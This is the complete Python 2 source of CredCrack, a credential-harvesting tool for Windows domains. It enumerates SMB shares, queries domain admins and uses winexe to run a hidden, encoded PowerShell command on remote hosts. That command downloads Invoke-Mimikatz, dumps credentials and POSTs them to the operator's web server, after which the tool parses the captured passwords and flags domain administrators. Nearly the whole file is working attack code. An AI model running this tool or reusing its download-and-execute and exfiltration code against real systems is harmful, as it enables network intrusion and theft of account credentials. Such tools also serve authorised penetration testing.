#!/usr/bin/env python2 # CredCrack - A fast and stealthy credential harvester # This script harvests credentials for any given IP(s) and # notifies one when domain administrator credentials have # been captured. The harvester functionality is limited to # systems running Windows and Powershell version 2+ # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . # # Author: Jonathan Broche # Email: jb@gojhonny.com # Twitter: @g0jhonny # Version: 1.1 # Date: 2015-08-26 import subprocess, os, argparse, time, datetime, socket, base64, threading, Queue, hashlib, binascii, signal, sys, getpass from shlex import split from shutil import rmtree, copy harvested_hosts = [] class colors: lightblue = "\033[1;36m" lightgrey = "\033[0;37m" blue = "\033[1;34m" normal = "\033[0;00m" red = "\033[1;31m" yellow = "\033[1;33m" white = "\033[1;37m" green = "\033[1;32m" class LoginFailure(Exception): pass #----------------------------------------# # SETUP # #----------------------------------------# def setup(lhost): print "{}[*]{} Setting up the stage".format(colors.blue, colors.normal) if not os.path.exists('/var/www/Invoke-Mimikatz.ps1'): print "{}[!]{} Dependency not met. Please download Invoke-Mimikatz.ps1 and store it in /var/www".format(colors.red, colors.normal) print "{}[!]{} wget https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 -O /var/www/Invoke-Mimikatz.ps1\n".format(colors.red, colors.normal) return False funps = """ IEX (New-Object Net.WebClient).DownloadString('http://{lh}/Invoke-Mimikatz.ps1'); $creds = Invoke-Mimikatz -DumpCreds; $request = [System.Net.WebRequest]::Create('http://{lh}/creds.php'); $request.Method = "POST"; $request.ContentType = "application/x-www-form-urlencoded"; $bytes = [System.Text.Encoding]::ASCII.GetBytes($creds); $request.ContentLength = $bytes.Length; $requestStream = $request.GetRequestStream(); $requestStream.Write( $bytes, 0, $bytes.Length ); $requestStream.Close(); $request.GetResponse(); """.format(lh=lhost) credsphp = """ """ with open ('/var/www/creds.php', 'w') as f: f.write(credsphp) with open ('/var/www/fun.ps1', 'w') as f: f.write(funps) if not os.path.exists('/tmp/CCloot'): os.makedirs('/tmp/CCloot') os.chmod('/tmp/CCloot', 0707) try: apache_status = subprocess.check_output(split("ps -A")) if 'apache2' not in apache_status: subprocess.Popen(split('service apache2 start'), stderr=subprocess.STDOUT, stdout=subprocess.PIPE) return True except Exception as e: print "{}[!]{} Error trying to start Apache. {}".format(colors.red, colors.normal, e) return False #----------------------------------------# # VALIDATE IP # #----------------------------------------# def validate(rhost): try: print "{}[*]{} Validating {}".format(colors.blue, colors.normal, rhost) if socket.inet_aton(rhost): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(0.5) s.connect((rhost, 445)) #test if 445 is open on the remote host s.close() return True except socket.error as e: print "{}[!]{} Unable to connect to {}".format(colors.red, colors.normal, rhost) return False #----------------------------------------# # ENUM SHARE ACCESS # #----------------------------------------# def enum_shares(q, username, password, domain): lock = threading.Lock() try: while True: with lock: os = '' shares, endshares = [], [] rhost = q.get() #obtain available shares process = subprocess.Popen(split("smbclient -L //{} -U '{}/{}%{}'".format(rhost, domain, username, password)), stderr=subprocess.STDOUT, stdout=subprocess.PIPE) for line in filter(None, process.communicate()[0].split('\n')): share = line.strip('\t') if 'os=' in share.lower(): os = share.split(']')[1][5:] #operating system else: if any(badline in share for badline in ["Connection to", "NetBIOS", "None", "------"]): #filter bad lines pass else: for item in share.split(' '): if any(badshare in share for badshare in ["Printer", "IPC", ""]): #filter printer & ipc shares if 'Disk' in item: es = ' '.join(share.split(' ')[:share.split(' ').index(item)]).strip() if es not in shares: shares.append(es) #test share accessibility for share in shares: process = subprocess.Popen(split("smbclient //{}/'{}' -U '{}/{}%{}' -c dir".format(rhost, share, domain, username, password)), stderr=subprocess.STDOUT, stdout=subprocess.PIPE) if [item for item in filter(None, process.communicate()[0].split('\n')) if "NT_STATUS" in item]: #if NT_STATUS in response => closed share/error endshares.append(" CLOSED \\\\{}\\{} ".format(rhost, share)) else: endshares.append(" {}OPEN \\\\{}\\{}{} ".format(colors.lightgrey, rhost, share, colors.normal)) if endshares: print "\n " + "-" * 65 + "\n " + colors.normal + "{} - {} \n ".format(rhost, os) + "-" * 65 + "\n " for share in endshares: print share else: print "{}[!]{} No shares to list on {}. Ensure the correct password was used.".format(colors.red, colors.normal, rhost) q.task_done() except Exception as e: print "{}[!]{} Error listing shares on {}: {}".format(colors.red, colors.normal, rhost, e) q.task_done() #----------------------------------------# # GET DOMAIN ADMINS # #----------------------------------------# def get_das(rhost, username, password, domain): das = [] try: print "{}[*]{} Querying domain admin group from {}".format(colors.blue, colors.normal, rhost.rstrip()) process = subprocess.Popen(split("winexe --system //{} -U {}/{}%{} 'cmd /c net group \"Domain Admins\" /domain'".format(rhost, domain, username, password)), stderr=subprocess.PIPE, stdout=subprocess.PIPE) output = process.stdout.read() error = process.stderr.read() if any(err in error for err in ["NT_STATUS_LOGON_FAILURE", "NT_STATUS_ACCOUNT_LOCKED_OUT"]): raise LoginFailure(error.strip()) else: da_output = output.replace("The command completed successfully.","").split()[output.split().index("Members")+2:] if da_output: for da in da_output: if da: das.append(da.strip()) return das except LoginFailure as e: print "{}[!]{} {}".format(colors.red, colors.normal, e) sys.exit(os.EX_OSERR) except Exception as e: if "'Members' is not in list" in e: print "{}[!]{} User is not an admin on {} or the system is not joined to a domain".format(colors.red, colors.normal, rhost) else: print "{}[!]{} Failed to obtain domain admin list from {}: {}".format(colors.red, colors.normal, rhost, e) return False #----------------------------------------# # HARVEST CREDENTIALS # #----------------------------------------# def harvest(q, username, password, domain, lhost): lock = threading.Lock() try: while True: rhost = q.get() if rhost in harvested_hosts: q.task_done() with lock: print "{}[*]{} Harvesting credentials from {}".format(colors.blue, colors.normal, rhost) harvested_hosts.append(rhost) encoded_cmd = base64.b64encode("IEX (New-Object Net.WebClient).DownloadString('http://{}/fun.ps1')".format(lhost).encode('utf_16_le')) process = subprocess.Popen(split("winexe --system //{} -U {}/{}%{} 'cmd /c echo . | powershell.exe -w hidden -Exec Bypass -noni -nop -enc {}'".format(rhost, domain, username, password, encoded_cmd)), stderr=subprocess.PIPE, stdout=subprocess.PIPE) error = process.stderr.read() if error and "NT_STATUS_ACCESS_DENIED" in error: raise Exception("NT_STATUS_ACCESS_DENIED") timeout = 20 while timeout > 0: status = process.poll() if status is None: time.sleep(0.1) timeout -=0.1 else: break if timeout <=0: print "{}[!]{} Timed out harvesting credentials from {}".format(colors.red, colors.normal, rhost) process.terminate() q.task_done() except OSError: pass except Exception as e: print "{}[!]{} Error harvesting credentials from {}: {}".format(colors.red, colors.normal, rhost, e) q.task_done() #----------------------------------------# # PARSE LOOT # #----------------------------------------# def parse_loot(): files = next(os.walk('/tmp/CCloot'))[2] credentials = [] for fi in files: #parse all files within the CCloot directory with open (os.path.join('/tmp/CCloot', fi)) as f: lines = f.readlines() for i in [x for x, y in enumerate(lines) if 'wdigest' in y]: if 'username' in lines[i+1].lower() and not any(x in lines[i+1].lower() for x in ['$', '(null)']): #if username does not have $ or null if lines[i+3][15:].rstrip() != '(null)': #if password is not null domain, user, pw = lines[i+2][15:].rstrip(), lines[i+1][15:].rstrip(), lines[i+3][15:].rstrip() if [u for r, d, u, p in credentials if user in u]: #omitting duplicate credentials pass else: credentials.append((fi, domain, user, pw)) #add credentials return credentials #----------------------------------------# # OUTPUT # #----------------------------------------# def output(credentials, das): da_counter = 0 try: if credentials: print """\n {lg}The loot has arrived...{y} __________ /\____;;___\ | / / `. ())oo() . |\(%()*^^()^\ %| |-%-------| % \ | % )) | % \|%________| {n}""".format(lg=colors.lightgrey, y=colors.yellow, n=colors.normal) with open ('/tmp/CCloot/l00t', 'w') as f: f.write("\n " + "-" * 69 + "\n " + " CredCrack Loot \n " + "-" * 69 + "\n\n") for cred in credentials: if cred[2] in das and cred[2] != "Administrator": #d = domain, #u = username, #p = password print "{y}[*] Host: {r} Domain: {d} User: {u} Password: {p}{n}".format(y=colors.yellow, r=cred[0], d=cred[1], u=cred[2], p=cred[3], n=colors.normal) f.write("[*] Host: {r} Domain: {d} User: {u} Password: {p} {y}-- Domain Admin{n}\n".format(r=cred[0], d=cred[1], u=cred[2], p=cred[3], y=colors.yellow, n=colors.normal)) da_counter+=1 else: print "{w}[*]{lg} Host: {r} Domain: {d} User: {u} Password: {p}{n}".format(w=colors.white, lg=colors.lightgrey, r=cred[0], d=cred[1], u=cred[2], p=cred[3], n=colors.normal) f.write("[*] Host: {r} Domain: {d} User: {u} Password: {p}\n".format(r=cred[0], d=cred[1], u=cred[2], p=cred[3])) if da_counter: print "\n {y}{dac}{n} domain administrators found and highlighted in yellow above!\n".format(y=colors.yellow, dac=da_counter, n=colors.normal) return True else: print "\n{red}[!]{n} No Loot?! Argh!\n".format(red=colors.red, n=colors.normal) return False except Exception as e: print '{red}[!]{n} Error outputting loot. {exc}'.format(red=colors.red, n=colors.normal, exc=e) #----------------------------------------# # CLEAN UP # #----------------------------------------# def clean_up(flag, stime): print "\n{}[*]{} Cleaning up".format(colors.blue, colors.normal) try: if flag: #script completed successfully os.remove(os.path.join('/var/www', 'creds.php')) os.remove(os.path.join('/var/www', 'fun.ps1')) if os.path.exists(os.path.join(os.getenv('HOME'), 'CCloot')): dirname = os.path.join(os.getenv('HOME'), 'CCloot_{}'.format(datetime.datetime.now().strftime('%Y%m%d_%H:%M:%S'))) os.rename('/tmp/CCloot', dirname ) os.chmod(dirname, 0700) else: dirname = os.path.join(os.getenv('HOME'), 'CCloot') os.rename('/tmp/CCloot', dirname) os.chmod(dirname, 0700) subprocess.Popen(split('service apache2 stop'), stderr=subprocess.STDOUT, stdout=subprocess.PIPE) print "{}[*]{} Done! Loot may be found under {} folder{}".format(colors.green, colors.white, dirname, colors.normal) print "{}[*]{} Completed in {:.1f}s\n".format(colors.blue, colors.normal, time.time()- stime) else: #script did not complete successfully subprocess.Popen(split('service apache2 stop'), stderr=subprocess.STDOUT, stdout=subprocess.PIPE) if os.path.exists('/tmp/CCloot'): rmtree('/tmp/CCloot') if os.path.exists('/var/www/fun.ps1'): os.remove('/var/www/fun.ps1') if os.path.exists('/var/www/creds.php'): os.remove('/var/www/creds.php') except Exception as e: print "{}[!]{} Error cleaning up. {}".format(colors.red, colors.normal, e) #----------------------------------------# # MAIN # #----------------------------------------# def main(): example = "Examples: \n\n./credcrack.py -d acme -u bob -f hosts -es\n./credcrack.py -d acme -u bob -f hosts -l -t 20" parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, description="CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)", epilog=example) required = parser.add_argument_group("Required") required.add_argument('-d', '--domain', required=True, help='Domain or Workstation') required.add_argument('-u', '--user', required=True, help='Domain username') action = parser.add_mutually_exclusive_group(required=True) action.add_argument('-f', '--file', help='File containing IPs to harvest creds from. One IP per line.') action.add_argument('-r', '--rhost', help='Remote host IP to harvest creds from.') parser.add_argument('-es', '--enumshares', help='Examine share access on the remote IP(s)', action='store_true') parser.add_argument('-l', '--lhost', help='Local host IP to launch scans from.') parser.add_argument('-t', '--threads', help='Number of threads (default: 10)', default=10, type=int) args = parser.parse_args() args.passwd = getpass.getpass() print "\n " + "-" * 69 + "\n " + colors.white + " CredCrack v1.1 by Jonathan Broche (@g0jhonny)\n " + colors.normal + "-" * 69 + "\n " stime = time.time() das, credentials, badhost = [], [], [] q = Queue.Queue(maxsize=0) try: if not args.passwd: print "{}[!]{} Please provide a password\n".format(colors.red, colors.normal) return if args.enumshares: if args.rhost: if validate(args.rhost): q.put(args.rhost) elif args.file: with open (args.file) as f: lines = [ip.strip() for ip in f.readlines() if ip.strip() and validate(ip.strip())] for line in lines: q.put(line) if q.queue: for i in range(args.threads): worker = threading.Thread(target=enum_shares, args=(q, args.user, args.passwd, args.domain)) worker.setDaemon(True) worker.start() q.join() print "\n{}[*]{} Done! Completed in {:.1f}s\n".format(colors.green, colors.normal, time.time()- stime) else: if args.lhost: if setup(args.lhost): if args.rhost: if validate(args.rhost): das = get_das(args.rhost, args.user, args.passwd, args.domain) q.put(args.rhost) if args.file: with open (args.file) as f: lines = [ip.strip() for ip in f.readlines() if ip.strip() and validate(ip.strip())] for line in lines: das = get_das(line, args.user, args.passwd, args.domain) if not das: #put the host on a bad list badhost.append(lines[lines.index(line)]) else: #we got our domain admin list if badhost: #if badhosts, filter before queue for good_ip in [ip for ip in lines if ip not in badhost]: q.put(good_ip) else: #only good hosts? put them in the queue! for good_ip in lines: q.put(good_ip) break if das: for num in range(args.threads): worker = threading.Thread(target=harvest, args=(q, args.user, args.passwd, args.domain, args.lhost)) worker.setDaemon(True) worker.start() q.join() if output(parse_loot(), das): clean_up(True, stime) else: clean_up(False, stime) else: clean_up(False, stime) else: print "{}[!]{} Provide the IP address of the local host [-l]\n".format(colors.red, colors.normal) except (KeyboardInterrupt, SystemExit): print "\n{}[!]{} Terminating script".format(colors.yellow, colors.normal) clean_up(False, stime) except IOError: print "{}[!]{} File: {} does not exist.".format(colors.red, colors.normal, args.file) clean_up(False, stime) if __name__ == '__main__': main()